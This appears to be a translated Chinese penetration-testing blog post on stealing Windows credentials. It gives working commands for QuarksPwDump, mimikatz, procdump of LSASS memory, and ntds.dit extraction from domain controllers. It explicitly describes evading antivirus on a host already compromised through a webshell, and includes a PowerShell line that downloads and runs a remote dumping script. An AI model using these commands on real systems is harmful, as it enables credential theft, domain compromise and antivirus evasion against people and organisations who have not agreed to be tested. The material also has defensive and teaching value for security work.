0x01 windows password Hash
The early SMB protocol transmitted clear text passwords over the network. Then came the "LAN Manager Challenge/Response" authentication mechanism, or LM for short, which was so simple that it was easy to crack. Microsoft proposed a WindowsNT challenge/response authentication mechanism, called NTLM. There are now updated NTLMv2 and Kerberos authentication schemes. The password encrypted by Windows is called hash (Chinese: hash). The system password hash of Windows generally consists of two parts by default: the first part is LM-hash, and the second part is NTLM-hash.
Compared with the LM-Hash algorithm, the plaintext password of NTLM-Hash is case-sensitive, but it is impossible to judge whether the original plaintext password is less than 8 bytes according to NTLM-Hash, and it gets rid of the magic string "KGS!@#$%". MD4 is a true one-way hash function, and it is difficult to exhaustively enumerate the plaintext that appears as a data source. The problem is that Microsoft insists on the strength of NTLM-Hash, but ignores the fact that, in order to maintain backward compatibility, NTLM-Hash is always used with LM-Hash by default. This means that NTLM-Hash emphasizes that no matter how high it is, it will not help security, but it will potentially damage security. After adding NTLM-Hash, first use the weakness of LM-Hash to enumerate the case-insensitive version of the original plaintext password, and then use NTLM-Hash to correct the case-sensitive version of the original plaintext password.
The hash password format under Windows system is: user name: RID: LM-HASH value: NT-HASH value, for example: Administrator: 500: C8825DB10F2590EAAAD3B435B51404EE: 683020925C5D8569C23AA724774CE6CC::: means
Username is: Administrator
RID is: 500
The LM-HASH value is: C8825DB10F2590EAAAD3B435B51404EE
NT-HASH value: 683020925C5D8569C23AA724774CE6CC
If you know the hash password of this user, take C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC to the hash online query website.
0x02 QuarksPwDump
Generally, QuarksPwDump_v0.2b is used to capture the password hash of the entire Windows series, and the obtained hash value can be queried at http://www.objectif-securite.ch/ophcrack.php.
The command for QuarksPwDump to grab the password is as follows: (For other commands, please refer to the software description)
quarkspwdump.exe -dhl
The entire HASH value obtained is used for online cracking.
0x03 mimikatz
Use the password grabbing artifact mimikatz to test it. The command is as follows:
privilege::debug
sekurlsa::logonpasswords
The graphical result is as follows:
Have you found that the LM-HASH captured by mimikatz and QuarksPwDump is different, and mimikatz directly obtained the system password. The results obtained by the two software NT-HASH are the same.
During the penetration test, such a scenario will occur. I have already connected the chopper to the other host, but the system has 360 Security Guard or other security software installed by default. Both the mimikatz and QuarksPwDump I uploaded were killed. That is to say, it is impossible for me to use the conventional ideas of these two software to obtain the password HASH of the system. In fact, we can dump the LSASS memory file of the other host first, and then process it with mimikatz on our own host, so that we can get the system HASH and password of the other host.
You can go to Microsoft's official website to download ProDump , this will definitely not cause anti-virus software to report virus and kill.
The command is as follows:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
The diagram is as follows:
Next, demonstrate the local cracking with mimikatz:
First enter the command:
mimikatz.exe "sekurlsa::minidump lsass.dmp"
Then enter the command:
sekurlsa::logonpasswords
It can be seen that the system password can be obtained offline, so that the anti-virus software can be bypassed on the other host.
In the dark cloud knowledge base, there are also commands that use PowerShell to complete the same work as Prodump. The specific commands are as follows:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"
I tried it on the infiltrated host and found that it is also feasible, but an error will be displayed under the virtual terminal of the chopper, in fact, the Powershell code has been successfully executed. However, the overall feeling is that Prodump is more convenient to use.
There is also mimkatz integration in Metasploit. For specific tutorials, please refer to http://www.offensive-security.com/metasploit-unleashed/Mimikatz
0x04 NTDSDump related
I couldn't stand the speed of NTDSXTract, so I used quarkspwdump to change the offline version extraction tool that can read system.hiv.
ntds.dit is actually an esent database, and Microsoft itself has a series of documented APIs that can operate this database.
Its command line is as follows:
ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]
-f ntds.dit path
-k optional SYSKEY in hex format
-s optional system.hiv path
-h export password history
-t export format, LC or JOHN
-o export to the specified file
SYSKEY is actually the type information of several subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which can be queried with RegQueryInfoKey.
The attachment provides two export tools, getsyskey_c.exe is compiled by vc6, and its source code is getsyskey.cpp, which can be directly opened and compiled with vc6.
getsyskey_cs.exe is compiled by .net2.0, and the source code is getsyskey.cs, which can be compiled directly with csc.
Known bugs:
JetAttachDatabase() failed
Reason: The database needs to be repaired, execute esentutl /p /o ntds.dit to repair.
download link:
Another: After the modification, I looked at the github of quarkspwdump and found that someone submitted a pull request: https://github.com/quarkslab/quarkspwdump/pull/3
It adds a function to load system.hiv, which calls RegLoadKey. And this API must pass UAC, so it is quite awkward to use, it is not as good as reading the file directly for processing.
Safe Pulse Posture
Use ntdsutil snapshot mount to export ntds.dit, SAM and System on 2008+ domain controller,
ntdsutil snapshot activate instance ntds create mount {GUID} copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit unmount {GUID} quit quit Then there are all kinds of copies
Use QuarksPwDump.exe on the domain controller to export most of the plaintext:
QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit
Downloading it back to the local area and then using QuarksPwDump seems to not work, mainly because the SYSTEM file cannot be specified locally, so the key cannot be obtained.
With Quarks PWDump parameters:
quarks-pwdump.exe <options>
Options :
-dhl --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd --dump-hash-domain (NTDS_FILE must be specified)
-db --dump-bitlocker (NTDS_FILE must be specified)
-nt --ntds-file FILE
-hist --with-history (optional)
-t --output-type JOHN/LC (optional, if no=>JOHN)
-o --output FILE (optional, if no=>stdout)
Example: quarks-pwdump.exe --dump-hash-domain --with-history
Of course, you can also download ntds.dit, SAM and System back (many large intranet ntds are several gigabytes, and it is not very scientific to download them back) to decrypt with a certain tool, but it feels a bit huge, now we can use NTDSDump.exe
NTDSDump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt
0x05 Reference link
https://www.secpulse.com/archives/6301.html
https://www.cnblogs.com/hiccup/p/4380298.html